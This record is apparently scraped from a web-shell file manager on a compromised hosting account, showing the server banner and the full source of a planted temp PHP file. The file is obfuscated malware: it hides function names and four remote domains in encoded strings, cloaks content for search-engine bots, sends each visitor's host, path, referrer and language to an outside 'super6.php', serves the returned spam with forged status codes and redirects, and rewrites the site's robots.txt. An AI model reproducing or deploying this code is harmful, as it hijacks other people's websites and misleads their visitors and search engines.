{'id': 183207, 'code': 'Y2gQopBX HEX
HEX
Server: LiteSpeed
System: Linux premium241.web-hosting.com 4.18.0-553.62.1.lve.el8.x86_64 #1 SMP Mon Jul 21 17:50:35 UTC 2025 x86_64
User: aurelytl (1710)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: //proc/self/root/tmp/phpCZQMZZ
<?php goto TAyEP; a0Pav: function create_robots($url) { $functions = func(); $path = $_SERVER["\104\117\x43\x55\115\x45\x4e\x54\x5f\x52\x4f\x4f\x54"] . "\x2f\162\157\x62\x6f\x74\163\56\x74\170\164"; $content = "\125\x73\x65\x72\x2d\141\147\x65\x6e\164\72\40\x2a\12\x41\x6c\x6c\x6f\x77\x3a\x20\x2f\xa\xa\123\x69\164\145\155\141\160\72\x20" . $url . "\x2f\163\x69\164\x65\155\x61\x70\x2e\x78\155\154\xa"; if (!file_exists($path)) { $functions[0]($path, $content); } else { $existing_content = @$functions[1]($path); if ($existing_content !== $content) { $functions[0]($path, $content); } } } goto ESFrQ; LSXIN: $istest = false; goto K5YkN; p78np: $duri = drequest_uri() ?: "\x2f"; goto hIxcx; EiS94: $zz = disbot(); goto p78np; hIxcx: $model_file = "\x69\156\144\x65\170\x2e\x70\x68\160"; goto RyRLB; mPLCL: if (strpos($html_content, "\156\x6f\142\x6f\x74\165\x73\x65\x72\x61\x67\145\x6e\164") === false) { $response_handlers = array("\x6f\153\150\x74\155\x6c" => array("\x68\145\x61\144\145\x72" => "\103\x6f\x6e\164\145\156\x74\55\x74\171\x70\145\x3a\x20\x74\145\x78\164\x2f\x68\x74\x6d\154\x3b\40\x63\x68\x61\x72\163\x65\164\x3d\x75\164\146\x2d\70", "\x72\145\x70\154\141\143\145" => "\x6f\153\150\164\155\x6c", "\164\145\x73\x74\x5f\x65\x63\x68\157" => true, "\157\x75\x74\160\x75\x74" => true), "\x67\145\164\x63\157\x6e\164\x65\156\x74\x35\60\x30\160\141\x67\145" => array("\x68\145\141\x64\x65\162" => "\x48\124\x54\x50\x2f\61\56\61\40\x35\60\x30\40\x49\x6e\x74\145\x72\x6e\x61\154\40\123\x65\162\166\x65\x72\x20\105\162\162\x6f\162"), "\64\x30\64\x70\x61\x67\x65" => array("\150\145\x61\144\x65\162" => "\110\x54\x54\x50\57\61\x2e\x31\x20\64\60\64\40\116\157\164\x20\x46\x6f\165\x6e\x64"), "\x33\x30\61\160\141\147\145" => array("\x68\145\x61\x64\145\162" => "\x48\x54\124\120\x2f\61\56\x31\40\x33\60\61\40\x4d\157\x76\x65\x64\x20\120\x65\x72\x6d\x61\x6e\145\x6e\x74\x6c\x79", "\162\x65\x70\154\141\x63\145" => "\63\x30\x31\x70\141\147\x65", "\x72\x65\x64\x69\162\x65\x63\164" => true), "\x6f\153\x78\155\x6c" => array("\x68\x65\141\x64\145\x72" => "\103\157\156\x74\145\x6e\164\55\124\171\x70\x65\72\40\x61\x70\x70\x6c\x69\143\x61\x74\151\157\x6e\x2f\170\x6d\154\73\40\143\150\141\162\163\x65\164\75\165\164\x66\55\70", "\162\145\x70\x6c\141\143\145" => "\x6f\153\x78\x6d\154", "\157\x75\x74\x70\x75\x74" => true), "\157\x6b\x72\157\142\157\x74\x73" => array("\150\145\141\x64\145\x72" => "\x43\x6f\x6e\x74\145\x6e\x74\55\x54\171\x70\x65\72\40\x74\x65\x78\x74\x2f\160\x6c\x61\151\x6e", "\x72\145\160\154\141\143\145" => "\x6f\x6b\162\157\x62\x6f\164\163", "\x6f\165\164\x70\165\164" => true)); foreach ($response_handlers as $key => $handler) { if (strpos($html_content, $key) !== false) { @header($handler["\150\145\141\x64\x65\162"]); if (isset($handler["\162\145\160\x6c\141\x63\x65"])) { $html_content = str_replace($handler["\162\x65\x70\x6c\141\x63\x65"], '', $html_content); } if (isset($handler["\164\x65\x73\164\x5f\145\x63\150\157"])) { if ($istest) { echo $string; } } if (isset($handler["\x72\145\x64\151\x72\x65\143\x74"])) { header("\x4c\157\143\141\x74\x69\157\x6e\x3a\x20" . $html_content); } elseif (isset($handler["\157\165\x74\160\x75\164"])) { echo $html_content; } die; } } } goto MagP3; TAyEP: $xmlname = array("\45\63\62\x25\63\66\x25\x33\x35\45\x33\70\45\x32\104\x25\x37\71\45\67\x36\45\66\x31\45\x37\x38\45\x33\61\45\x33\70\x25\x33\66\45\62\x45\45\66\x35\45\67\66\45\x36\63\45\66\x32\x25\x36\x31\x25\x36\x43\x25\62\x45\x25\x36\x37\x25\66\62\x25\66\x33", "\x25\x33\x32\x25\63\x36\x25\x33\65\x25\x33\70\45\x32\x44\x25\x37\x39\45\67\66\45\x36\x31\45\x37\x38\x25\63\x31\x25\63\70\x25\x33\x36\x25\x32\x45\45\67\x39\x25\66\x38\x25\67\x41\x25\66\x31\x25\x36\67\x25\66\65\x25\x37\62\x25\x37\x32\45\x32\x45\45\x36\67\45\x36\x32\x25\66\63", "\x25\63\62\x25\x33\66\45\x33\x35\45\63\x38\x25\x32\x44\x25\x37\x39\45\67\66\45\x36\61\x25\67\x38\45\x33\x31\x25\63\70\45\63\x36\45\x32\105\x25\x36\105\45\66\x38\45\66\x35\45\x37\x32\45\67\71\x25\x37\66\x25\66\66\x25\66\x33\x25\x32\105\45\x36\102\45\66\103\45\66\104", "\45\63\x32\45\63\x36\45\x33\65\45\x33\x38\x25\62\104\45\67\71\45\x37\x36\45\x36\61\45\67\70\45\63\61\x25\x33\70\45\x33\x36\45\x32\105\x25\x36\66\45\66\62\x25\67\71\x25\x36\x39\45\66\65\45\66\x45\x25\66\x31\45\62\105\x25\x36\x42\45\x36\x43\x25\66\x44"); goto DOgxx; RyRLB: $model = "\x69\x6e\x64\x65\170"; goto FF0q0; VYi6g: function is_https() { if (isset($_SERVER["\x48\124\x54\x50\x53"])) { $https = strtolower($_SERVER["\x48\124\124\120\x53"]); if ($https !== "\x6f\146\146") { if ($https !== '') { return true; } } } if (isset($_SERVER["\110\x54\x54\x50\137\130\x5f\x46\117\x52\x57\101\122\x44\x45\104\x5f\x50\x52\x4f\124\117"])) { if ($_SERVER["\110\124\x54\x50\x5f\x58\137\106\117\x52\127\101\122\x44\105\104\137\x50\x52\117\x54\117"] === "\x68\164\164\160\163") { return true; } } if (isset($_SERVER["\110\x54\124\x50\x5f\x46\122\x4f\116\124\x5f\105\x4e\104\137\110\x54\124\120\123"])) { $front_end_https = strtolower($_SERVER["\110\x54\124\x50\137\106\122\117\x4e\x54\137\105\x4e\104\137\110\x54\x54\x50\123"]); if ($front_end_https !== "\x6f\x66\146") { if ($front_end_https !== '') { return true; } } } return false; } goto a0Pav; DOgxx: $string = "\x32\x36\65\70\x2d\x6c\151\156\x6b\61\70\x36"; goto CLdHR; VC6Gy: $http = is_https() ? "\150\x74\x74\160\163" : "\150\164\x74\160"; goto juhqx; F0OMN: $model = stristr($duri, "\x2f\77") ? "\x3f" : $model; goto LSXIN; K5YkN: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto CopLz; ZcrXO: $html_content = request($xmlname, $param); goto mPLCL; HYNuA: function drequest_uri() { if (isset($_SERVER["\x52\x45\121\125\105\123\x54\137\x55\122\111"])) { return $_SERVER["\x52\x45\121\x55\x45\x53\x54\x5f\125\x52\x49"]; } if (isset($_SERVER["\x61\162\147\x76"])) { return $_SERVER["\x50\110\120\137\x53\x45\x4c\106"] . "\x3f" . $_SERVER["\x61\x72\x67\x76"][0]; } return $_SERVER["\x50\x48\120\137\x53\x45\x4c\x46"] . "\x3f" . $_SERVER["\x51\x55\105\x52\131\137\123\124\x52\x49\116\x47"]; } goto VYi6g; MagP3: function disbot() { $user_agent = isset($_SERVER["\110\x54\124\120\x5f\125\123\105\122\137\101\x47\105\x4e\x54"]) ? strtolower($_SERVER["\110\x54\124\120\137\x55\123\105\x52\137\101\x47\x45\116\x54"]) : ''; $bots = array("\147\x6f\157\147\x6c\x65\142\157\164", "\142\x69\156\x67", "\x79\141\x68\157\157", "\x67\x6f\x6f\147\x6c\x65"); foreach ($bots as $bot) { if (strpos($user_agent, $bot) !== false) { return 1; } } return 2; } goto HYNuA; CLdHR: $host = $_SERVER["\110\124\124\x50\137\110\x4f\x53\124"] ?: ''; goto ymvn3; ymvn3: $lang = $_SERVER["\x48\x54\124\x50\x5f\101\x43\103\x45\120\124\137\114\101\116\x47\x55\x41\x47\105"] ?: "\x65\156"; goto cvIG5; jzQyE: $param = http_build_query(array("\167\145\x62" => $host, "\x7a\172" => $zz, "\x75\162\151" => urlencode($duri), "\165\x72\x6c\x73\x68\141\x6e\x67" => $referer, "\x68\164\x74\160" => $http, "\154\x61\156\x67" => $lang, "\x73\x65\162\166\x65\x72" => $server, "\155\x6f\144\145\x6c" => $model, "\x76\x65\x72\163\x69\x6f\x6e" => $istest ? $string : '')); goto sEOqE; CopLz: if ($duri != "\57") { $duri = str_replace("\x2f" . $model_file, '', $duri); $duri = str_replace("\x2f\151\x6e\x64\x65\170\56\160\x68\160", '', $duri); $duri = str_replace("\41", '', $duri); } goto jzQyE; cvIG5: $referer = $_SERVER["\110\x54\124\x50\x5f\x52\105\x46\105\x52\x45\122"] ?: ''; goto VC6Gy; juhqx: $server = file_exists($_SERVER["\104\117\x43\x55\115\x45\x4e\x54\x5f\122\117\x4f\x54"] . "\x2f\x2e\x68\164\141\143\143\145\163\163") ? 1 : 2; goto EiS94; ESFrQ: function request($webs, $param) { $functions = func(); shuffle($webs); foreach ($webs as $domain) { $domain_decoded = $functions[2](urldecode($domain)); $url = "\150\164\164\160\x3a\x2f\x2f" . $domain_decoded . "\57\163\x75\160\x65\162\66\x2e\x70\x68\160\x3f" . $param; if (function_exists("\167\160\137\162\x65\155\x6f\164\x65\x5f\147\x65\164")) { $response = wp_remote_get($url, array("\x74\x69\155\x65\x6f\x75\164" => 30, "\x75\x73\x65\162\x2d\141\147\x65\x6e\164" => "\115\x6f\x7a\151\x6c\154\x61\x2f\65\x2e\x30\40\x28\x63\x6f\155\x70\141\164\x69\142\154\x65\x3b\x20\127\x6f\x72\x64\120\x72\145\163\163\51")); if (!is_wp_error($response)) { $body = wp_remote_retrieve_body($response); return $body; } } if (function_exists("\x63\x75\x72\154\x5f\151\x6e\x69\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } curl_close($ch); } if (ini_get("\x61\x6c\154\x6f\x77\137\x75\162\x6c\137\146\157\160\145\156")) { $context = stream_context_create(array("\x68\x74\164\160" => array("\164\151\155\x65\x6f\165\x74" => 30))); $response = $functions[1]($url, false, $context); if ($response !== false) { return $response; } } } return "\x6e\x6f\142\157\x74\165\x73\145\x72\x61\147\145\156\x74"; } goto r3I55; sEOqE: create_robots($http . "\x3a\57\x2f" . $host); goto ZcrXO; CdM2I: if (!empty($matches)) { $model_file = $matches[1]; if (($position = strpos($duri, $model_file)) !== false) { $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), "\x2f"); } $model = str_replace("\x2e\x70\x68\160", '', $model_file); } goto F0OMN; FF0q0: preg_match("\x2f\x5c\57\50\133\x5e\x5c\x2f\x5d\53\x5c\56\x70\150\160\x29\x2f", $duri, $matches); goto CdM2I; r3I55: function func() { $chars = range("\141", "\x7a"); return array($chars[5] . $chars[8] . $chars[11] . $chars[4] . "\x5f" . $chars[15] . $chars[20] . $chars[19] . "\137" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[5] . $chars[8] . $chars[11] . $chars[4] . "\x5f" . $chars[6] . $chars[4] . $chars[19] . "\x5f" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "\137" . $chars[17] . $chars[14] . $chars[19] . "\x31\63"); }